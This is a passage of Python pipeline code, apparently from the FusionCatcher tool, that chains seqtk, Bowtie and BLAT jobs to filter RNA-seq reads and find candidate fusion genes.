job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',input_file,kind='input') job.add('--list',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('--output',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('>',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. 
"+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('--output','-',kind='parameter',checksum='no') elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-B',options.trim_psl_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_for-trimming.fq'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_not-for-trimming.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_for-trimming.fq'),kind='input',temp_path=temp_flag) job.add('>',output_file,kind='output') job.run() else: job.link(input_file, output_file, temp_path=temp_flag) if min_len_reads >= 47 and not options.skip_prefiltering_psl: # pre-filter the reads for BLAT because BLAT is slow # test to see if there are parts of the reads which can be mapped on gene-gene.fa using Bowtie which is faster # if yes then pass them to BLAT piece = 23 # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-B',piece,kind='parameter') 
job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='output') job.run() # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='output') # job.add('--trim_end','5',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') #job.add('-q','0',kind='parameter') job.add('-E',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='output') job.run() # group reads which mapped partially #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_3.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'),kind='output') job.run() if min_len_reads >= 59: # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='output') # job.add('--trim_end','5',kind='parameter') # job.add('--trim_size','7',kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-b','7',kind='parameter') job.add('-B',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') #job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='output') #job.run() # job.add('trim_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',piece,kind='parameter') # job.run() #job.add('seqtk',kind='program') #job.add('|',kind='parameter') #job.add('seqtk',kind='parameter') #job.add('trimfq',kind='parameter') #job.add('-q','0',kind='parameter') #job.add('-B',piece,kind='parameter') #job.add('-',piece,kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_4.fq'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='output') job.run() # job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-e','7',kind='parameter') job.add('-E',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') #job.add('|',kind='parameter') #job.add('seqtk',kind='parameter') #job.add('trimfq',kind='parameter') #job.add('-E',piece,kind='parameter') 
#job.add('-',piece,kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_6.fq'),kind='output') job.run() # group reads which mapped partially #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_5.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_6.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'), temp_path=temp_flag) # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',piece,kind='parameter') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',piece,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_x.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='output') job.run() if nucleotides_ggu > options.limit_bowtie: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene_unique__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene_unique__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') job.add('-i',outdir('gene-gene_unique.fa'),kind='input') job.add('-o',outdir('gene-gene_unique_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_unique_split.fa'),'r').readlines()] for i,part in enumerate(parts): # build index job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input',temp_path=temp_flag) job.add('',part+'_dir/',kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') job.add('-v',options.mismatches,kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='output') 
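# NOTE (explanatory, standard bowtie output format): bowtie's default output
# has 8 columns (read name, strand, reference, 0-based offset, sequence,
# qualities, alignment count, mismatch descriptors); '--suppress 2,3,4,5,6,7,8'
# keeps only the read name, so the uniq/sort -u pipe below produces just the
# unique ids of the reads hitting any gene-gene sequence.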
job.add('2>',outdir('log_bowtie_psl_all.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map.')+str(i),kind='output',dest_list='genegeneunique') job.run() job.clean(outdir('log_bowtie_psl_all.txt'),temp_path=temp_flag) job.sink(job.genegeneunique, outdir('genegeneunique.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('genegeneunique.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='output') job.run() # for ft in job.genegeneunique: # job.clean(ft,temp_path=temp_flag) job.clean(job.genegeneunique,temp_path=temp_flag) else: # build index job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('gene-gene_index/'),kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') job.add('-v',options.mismatches,kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') if os.path.isfile(outdir('gene-gene_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') job.add('',outdir('gene-gene_index/'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_final.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='output') job.add('2>',outdir('log_bowtie_psl_all.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: 
job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='output') job.run() job.clean(outdir('log_bowtie_psl_all.txt'),temp_path=temp_flag) # here I could remove the reads which have pieces mapping very closely to each other (all pieces [more than two] of a read map inside a gene => remove the read) # extract the short reads which mapped on gene-gene with Bowtie # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input',temp_path=temp_flag) # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_gene-gene.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input') job.add('--output','-',kind='parameter',checksum='no') job.add('>',outdir('reads_gene-gene.fq'),kind='output') job.run() else: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),kind='input') # job.add('|',kind='parameter') # job.add('seqtk',kind='parameter') # convert it to Sanger quality scores # job.add('seq',kind='parameter') # job.add('-Q64',kind='parameter') # job.add('-V',kind='parameter') # job.add('-',kind='parameter') job.add('>',outdir('reads_gene-gene.fq'),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'),temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_all_uniq.map'),temp_path=temp_flag) job.add('printf',kind='program') job.add(('"\nCounts of reads after BLAT/STAR/BOWTIE2 prefiltering (and before alignment):\n'+ '--------------------------------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_gene-gene.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: # link
job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'), outdir('reads_gene-gene.fq'), temp_path = temp_flag) if options.filter_str: # remove STR reads job.add(_FC_+'remove_str.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--threshold',options.filter_str,kind='parameter',checksum='no') job.add('--input',outdir('reads_gene-gene.fq'),kind='input',temp_path = temp_flag) job.add('--output',outdir('reads_gene-gene_no-str.fq'),kind='output') #job.add('--str',outdir('reads_gene-gene_str.fq'),kind='output',temp_path = temp_flag) job.add('--log',outdir('log_reads_gene-gene_no-str.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('log_reads_gene-gene_no-str.txt'),kind='input',temp_path = temp_flag) job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.link(outdir('reads_gene-gene.fq'), outdir('reads_gene-gene_no-str.fq'), temp_path = temp_flag) if options.skip_fastqtk: job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('--output',outdir('log_lengths_reads_gene-gene_no-str.txt'),kind='output') job.add('--counts',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='output') job.add('',outdir('log_lengths_reads_gene-gene_no-str.txt'),kind='output') job.run() # save lengths reads info(job, fromfile = outdir('log_lengths_reads_gene-gene_no-str.txt'), tofile = info_file, top = ["Lengths of all reads before BLAT/STAR/BOWTIE2 alignment", "-----------------------------------------------------------"], bottom = "\n\n\n") # save lengths reads info(job, fromfile = outdir('log_counts_reads_gene-gene_no-str.txt'), tofile = info_file, top = ["Count of all reads before BLAT/STAR/BOWTIE2 alignment", "---------------------------------------------------------"], bottom = "\n\n\n") if job.iff(empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-1#"): t = ["="*80, "WARNING: No candidate fusion genes have been found (no unmapped reads left after filtering)!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) ################################################################################ # BLAT alignment ################################################################################ if (not options.skip_blat) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-2#"): # convert FASTQ to FASTA # job.add('fastq2fasta.py',kind='program') # job.add('--input',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path = temp_flag if options.skip_star and options.skip_bowtie2 else 'no') # job.add('--output',outdir('reads_gene-gene.fa'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-A',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path = temp_flag if options.skip_star and options.skip_bowtie2 else 'no') job.add('>',outdir('reads_gene-gene.fa'),kind='output') job.run() # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY 
        job.add('>>',info_file,kind='output')
        job.run()

        job.add('free',kind='program')
        job.add('-m',kind='parameter')
        job.add('>>',info_file,kind='output')
        job.run()

        if nucleotides_gg > options.limit_blat:

            job.add(_FC_+'split-fasta.py',kind='program')
            job.add('--size',outdir('gene-gene__nuc.txt'),kind='input')
            job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input')
            job.add('--threshold',options.limit_blat,kind='parameter')
            job.add('-i',outdir('gene-gene.fa'),kind='input')
            job.add('-o',outdir('gene-gene_split_blat.fa'),kind='output')
            job.add('-x',outdir('gene-gene_split_blat.len'),kind='output')
            job.run()

            parts = [el.strip() for el in file(outdir('gene-gene_split_blat.fa'),'r').readlines()]
            maxlens = [el.strip() for el in file(outdir('gene-gene_split_blat.len'),'r').readlines()]

            for i,part in enumerate(parts):
                # file size
                # job.add('du',kind='program')
                # job.add('-b',part,kind='input')
                # job.add('|',kind='parameter')
                # job.add('cut',kind='parameter')
                # job.add('-f','1',kind='parameter')
                # job.add('>',part+'.len',kind='output')
                # job.run()

                # convert fasta to 2bit
                job.add(_FT_+'faToTwoBit',kind='program')
                job.add('',part,kind='input',temp_path=temp_flag)
                job.add('',part+'.2bit',kind='output')
                job.add('-noMask',kind='parameter')
                job.run()

                job.add(_FC_+'blat_parallel.py',kind='program')
                job.add('-noHead',kind='parameter')
                job.add('-stepSize=','5',kind='parameter',space='no') # 5
                job.add('-tileSize=','11',kind='parameter',space='no') # 11
                job.add('-minScore=','30',kind='parameter',space='no') # 30
                job.add('-t=','DNA',kind='parameter',space='no')
                job.add('-q=','RNA',kind='parameter',space='no') # originally it was DNA
                #job.add('-fine',kind='parameter')
                #job.add('-repMatch=','1000000',kind='parameter',space='no') # 2253 or 1000000?
                job.add('-repMatch=','2253',kind='parameter',space='no') # 2253 or 1000000?
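                # NOTE: -stepSize=5 together with -repMatch=2253 mirrors the settings of the
                # UCSC web BLAT server (see the FAQ link quoted in the branch below);
                # -repMatch=1000000 would effectively disable the over-represented tile filter.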
                job.add('-minIdentity=','30',kind='parameter',space='no') # 0
                job.add('-maxIntron=',maxlens[i],kind='parameter',space='no',from_file = 'yes') # default is 750000
                #job.add('-maxIntron=',outdir('gene-gene_longest.txt'),kind='parameter',space='no',from_file = 'yes') # default is 750000
                #job.add('-maxIntron=',part+'.len',kind='parameter',space='no',from_file = 'yes',temp_path=temp_flag) # default is 750000
                job.add('--tmp_dir=',tmp_dir,kind='parameter',checksum='no',space='no')
                if _BT_:
                    job.add('--blat_dir=',_BT_,kind='parameter',checksum='no',space='no')
                job.add('--cpus=',options.processes,kind='parameter',checksum='no',space='no') # it takes 5 GB per cpu, so here it means 12 * 5 = 60 GB
                job.add('--filter-fusion',kind='parameter',checksum='no') # WARNING: this does a very fast pre-filtering as done in "find_fusion_genes_blat.py"; THIS should be kept in sync with "find_fusion_genes_blat.py"
                job.add('',part+'.2bit',kind='input',temp_path=temp_flag)
                job.add('',outdir('reads_gene-gene.fa'),kind='input')
                job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl.')+str(i),kind='output',dest_list='genegeneblat')
                job.run()

            #job.clean(outdir('gene-gene_split_blat.fa'),temp_path=temp_flag)
            job.clean(outdir('reads_gene-gene.fa'),temp_path=temp_flag)

            job.sink(job.genegeneblat, outdir('reads_blat_mapped_on_fusion_genes.psl.txt'))

            job.add(_FC_+'concatenate.py',kind='program')
            job.add('-f',outdir('reads_blat_mapped_on_fusion_genes.psl.txt'),kind='input',temp_path=temp_flag)
            #job.add_list('',job.genegene,kind='input',temp_path=temp_flag,command_line='no')
            job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='output')
            job.run()

            # for tfile in job.genegeneblat:
            #     job.clean(tfile,temp_path=temp_flag)
            job.clean(job.genegeneblat,temp_path=temp_flag)
        else:
            # no splitting of BLAT reference sequences

            # convert fasta to 2bit
            job.add(_FT_+'faToTwoBit',kind='program')
            job.add('',outdir('gene-gene.fa'),kind='input')
            job.add('',outdir('gene-gene.2bit'),kind='output')
            job.add('-noMask',kind='parameter')
            job.run()

            # align the unmapped reads using BLAT on candidate fusion gene-gene
            #
            # web version of blat:
            #   blat -stepSize=5 -repMatch=2253 -minScore=0 -minIdentity=0 database.2bit query.fa output.psl
            # from: http://genome.ucsc.edu/FAQ/FAQblat.html
            #
            # other idea: ./blat -minIdentity=95 -fine -stepSize=1 -tileSize=6 -repMatch = 1000000
            # from http://www.gene2drug.com/product/?p=671 by Sucheta Tripathy
            job.add(_FC_+'blat_parallel.py',kind='program')
            job.add('-noHead',kind='parameter')
            job.add('-stepSize=','5',kind='parameter',space='no') # 5
            job.add('-tileSize=','11',kind='parameter',space='no') # 11
            job.add('-minScore=','30',kind='parameter',space='no') # 30
            job.add('-t=','DNA',kind='parameter',space='no')
            job.add('-q=','RNA',kind='parameter',space='no') # originally it was DNA
            #job.add('-fine',kind='parameter')
            #job.add('-repMatch=','1000000',kind='parameter',space='no') # 2253 or 1000000?
            job.add('-repMatch=','2253',kind='parameter',space='no') # 2253 or 1000000?
            job.add('-minIdentity=','30',kind='parameter',space='no') # 0
            job.add('-maxIntron=',outdir('gene-gene_longest.txt'),kind='parameter',space='no',from_file = 'yes') # default is 750000
            job.add('--tmp_dir=',tmp_dir,kind='parameter',checksum='no',space='no')
            job.add('--cpus=',options.processes,kind='parameter',checksum='no',space='no') # it takes 5 GB per cpu, so here it means 12 * 5 = 60 GB
            job.add('--filter-fusion',kind='parameter',checksum='no') # WARNING: this does a very fast pre-filtering as done in "find_fusion_genes_blat.py"; THIS should be kept in sync with "find_fusion_genes_blat.py"
            job.add('',outdir('gene-gene.2bit'),kind='input',temp_path=temp_flag)
            job.add('',outdir('reads_gene-gene.fa'),kind='input',temp_path=temp_flag)
            job.add('',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='output')
            job.run()

        # find the best unique alignments of reads
        job.add(_FC_+'psl_best_unique_contigs.py',kind='program')
        job.add('--input',outdir('reads_blat_mapped_on_fusion_genes.psl'),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'),kind='output')
        # if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))):
        #     job.add('--ties',datadir('custom_genes_mark.txt'),kind='input')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input')
        job.add('--anchor',length_anchor_blat,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough!
        job.add('--mismatches',options.mismatches_psl,kind='parameter')
        job.add('--processes',options.processes,kind='parameter',checksum='no')
        job.add('--tmp_dir',tmp_dir,kind='output',checksum='no')
        job.run()

        # more filtering -- remove the reads from the gene-gene junctions
        # which have their paired read mapping on a totally different gene than
        # those involved in the gene-gene junction
        if not options.all_reads_junction:
            job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program')
            job.add('--input_psl',outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'),kind='input',temp_path=temp_flag)
            job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 else 'no')
            job.add('--output_psl',outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'),kind='output')
            job.run()
        else:
            job.link(outdir('reads_best_unique_blat_mapped_on_fusion_genes.psl'),
                     outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'),
                     temp_path=temp_flag)

        job.add(_FC_+'find_fusion_genes_psl.py',kind='program')
        job.add('--input_mappings',outdir('reads_best_unique_blat_mapped_on_fusion_genes_pairs.psl'),kind='input',temp_path=temp_flag)
        job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 else 'no')
        job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
        job.add('--input_genes_positions',datadir('genes.txt'),kind='input')
        job.add('--threshold_overlap',length_anchor_blat,kind='parameter')
        job.add('--mismatches',options.mismatches_psl,kind='parameter')
        job.add('--output',outdir('candidates_fusion_genes_reads_blat7.txt'),kind='output')
        job.run()

        job.add(_FC_+'smoothing_fusions_psl.py',kind='program')
        job.add('--input',outdir('candidates_fusion_genes_reads_blat7.txt'),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('candidates_fusion_genes_reads_blat.txt'),kind='output')
        job.add('--wiggle','3',kind='parameter')
        job.run()

        # summarize the gene-gene mappings
        job.add(_FC_+'build_report_fusions_psl.py',kind='program')
        job.add('--suporting_unique_reads',spanning_reads_blat,kind='parameter')
        job.add('--anchor2',length_anchor2,kind='parameter')
        job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 and options.skip_spotlight else 'no')
        job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_star and options.skip_bowtie2 and options.skip_spotlight else 'no')
